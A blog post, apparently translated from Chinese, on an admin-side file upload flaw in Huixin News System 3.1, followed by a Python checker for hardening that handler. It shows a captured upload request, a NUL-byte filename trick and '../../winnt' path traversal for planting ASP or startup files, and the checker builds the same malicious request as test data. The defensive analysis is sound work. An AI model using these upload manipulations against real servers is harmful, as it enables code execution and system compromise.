SoFunction
Updated on 2025-04-13

Application of file upload vulnerability in Huixin

Recently everyone has been very excited about the dvbbs file upload vulnerability. I wondered whether it could be used in other systems, so I'll use the Huixin News System as an example to get the discussion going!
Huixin News System 3.1, Windows 2000 + SP4
Let's look at this code first, from admin_uploadfilesave.asp:
............... 
(formPath&) 
............................ 
When saving, the file is written as path + file name + extension, so we can use the same vulnerability as on dvbbs, but we apply it to the file name instead (the system has a fixed path; if the path is changed, the upload will not succeed).
This is the data I captured:
POST /admin_uploadfilesave.asp HTTP/1.1 
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* 
Referer: http://127.0.0.1/admin_uploadfile.asp 
Accept-Language: zh-cn 
Content-Type: multipart/form-data; boundary=---------------------------7d42cb1f101ae 
Accept-Encoding: gzip, deflate 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) 
Host: 127.0.0.1 
Content-Length: 658 
Connection: Keep-Alive 
Cache-Control: no-cache 
Cookie: ASPSESSIONIDCSACQQRQ=GKCHPMAACAKICGCMGMMBCLAL 

-----------------------------7d42cb1f101ae 
Content-Disposition: form-data; name="act" 

upload 
-----------------------------7d42cb1f101ae 
Content-Disposition: form-data; name="upcount" 


-----------------------------7d42cb1f101ae 
Content-Disposition: form-data; name="filepath" 

newstxt/ 
-----------------------------7d42cb1f101ae 
Content-Disposition: form-data; name="file1"; filename="G:\ .jpg" 
Content-Type: text/plain 

<% language=vbscript %> 
<ihihoiojpojppokkhhkhkhkhk 
hkhjkjkjjlkkkkkk> 

-----------------------------7d42cb1f101ae 
Content-Disposition: form-data; name="Submit" 

submit
-----------------------------7d42cb1f101ae-- 
I changed the filename to + (space).jpg, set Content-Length the same way as in the dvbbs exploit, then used a hex editor to change the space (hex 20) to 00, and the upload succeeded! hehe!

Now let's look at the path, which we cannot set freely: can we use ../../ to climb back out of it? Just try it and you will know. Capture the data as above, and in the part with name="filepath" change
newstxt/ to: newstxt/../../winnt
Content-Length: 658 to: 672 (658 + 14)
OK, start the upload, haha! The file turns up under winnt. So the path could then be changed to Windows's startup directory and exe, vbs, bat... files uploaded. However, everything above requires first obtaining administrator access to the news system.
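As an added example (not code from the Huixin News System or from the original write-up), here is a Python checker that performs, on a request shaped like the capture above, the validation admin_uploadfilesave.asp should have done before building path + file name + extension: reject NUL bytes in the filename, reject ".." or absolute paths in filepath, keep the final target inside the upload root, and flag ASP script markers in a file claiming to be an image. The field names and boundary come from the capture; the upload root, the allowed-extension list and the sample body are assumptions constructed for this example.

```python
"""Multipart upload inspector: the checks a hardened upload handler needs.

Added example, not code from the Huixin News System. UPLOAD_ROOT and
ALLOWED_EXT are assumptions; SAMPLE_BODY is constructed from the capture.
"""
import os
import posixpath
import re

UPLOAD_ROOT = "/var/www/newssite/upload"   # assumption: the fixed base directory
ALLOWED_EXT = {".jpg", ".gif", ".png", ".txt"}  # assumption: what the site should accept
BOUNDARY = "---------------------------7d42cb1f101ae"  # boundary from the capture


def _part(headers: str, data: str) -> str:
    return "--" + BOUNDARY + "\r\n" + headers + "\r\n\r\n" + data + "\r\n"


# Constructed sample: the captured request with both manipulations the
# write-up describes (NUL before ".jpg" in the filename, "../.." in filepath).
SAMPLE_BODY = (
    _part('Content-Disposition: form-data; name="act"', "upload")
    + _part('Content-Disposition: form-data; name="filepath"', "newstxt/../../winnt")
    + _part('Content-Disposition: form-data; name="file1"; filename="G:\\\x00.jpg"\r\n'
            "Content-Type: text/plain", "<% language=vbscript %>")
    + "--" + BOUNDARY + "--\r\n"
).encode("latin-1")


def parse_multipart(body: bytes, boundary: str) -> list:
    """Split a multipart/form-data body into dicts: name, filename, content_type, data."""
    parts = []
    for chunk in body.split(b"--" + boundary.encode("latin-1")):
        chunk = chunk.strip(b"\r\n")
        if not chunk or chunk == b"--":      # preamble / closing "--"
            continue
        head, _, data = chunk.partition(b"\r\n\r\n")
        headers = head.decode("latin-1")
        name = re.search(r'[;\s]name="([^"]*)"', headers)   # not "filename="
        fname = re.search(r'filename="([^"]*)"', headers)
        ctype = re.search(r"Content-Type:\s*(\S+)", headers, re.I)
        parts.append({
            "name": name.group(1) if name else "",
            "filename": fname.group(1) if fname else None,
            "content_type": ctype.group(1) if ctype else None,
            "data": data,
        })
    return parts


def inspect_upload(parts: list) -> list:
    """Return the reasons this upload must be rejected (empty list = clean)."""
    findings = []
    for p in parts:
        if p["name"] == "filepath":
            path = p["data"].decode("latin-1")
            segs = re.split(r"[\\/]", path)
            if ".." in segs or path.startswith(("/", "\\")) or re.match(r"[A-Za-z]:", path):
                findings.append("filepath: directory traversal or absolute path %r" % path)
        if p["filename"] is None:
            continue
        fname = p["filename"]
        if "\x00" in fname:
            # The NUL makes the saved name stop early, dropping the ".jpg" suffix.
            findings.append("%s: NUL byte in filename %r" % (p["name"], fname))
        base = re.split(r"[\\/]", fname)[-1]
        ext = os.path.splitext(base)[1].lower()
        if ext not in ALLOWED_EXT:
            findings.append("%s: extension %r not allowed" % (p["name"], ext))
        if re.search(rb"<%|<script", p["data"], re.I):
            findings.append("%s: server-side script marker in file body" % p["name"])
    return findings


def safe_target(filepath: str, filename: str) -> str:
    """Hardened path + name + extension: raises ValueError instead of escaping UPLOAD_ROOT."""
    if "\x00" in filepath or "\x00" in filename:
        raise ValueError("NUL byte in upload parameters")
    base = re.split(r"[\\/]", filename)[-1]          # drop any client-supplied directory
    ext = os.path.splitext(base)[1].lower()
    if not base or ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed: %r" % ext)
    target = posixpath.normpath(posixpath.join(UPLOAD_ROOT, filepath, base))
    if not target.startswith(UPLOAD_ROOT + "/"):     # ".." resolved outside the root
        raise ValueError("path escapes upload root: " + target)
    return target


def is_rejected(filepath: str, filename: str) -> bool:
    """True when safe_target() refuses the combination."""
    try:
        safe_target(filepath, filename)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for finding in inspect_upload(parse_multipart(SAMPLE_BODY, BOUNDARY)):
        print("REJECT:", finding)
```

Run on the constructed body, inspect_upload() reports three findings (the NUL filename, the script marker in the body and the traversal in filepath), and safe_target() refuses the "newstxt/../../winnt" path while still producing a normal target for "newstxt/" + "photo.jpg". Normalising the final path and checking it against the root is what makes the fixed-path assumption in the original code actually hold.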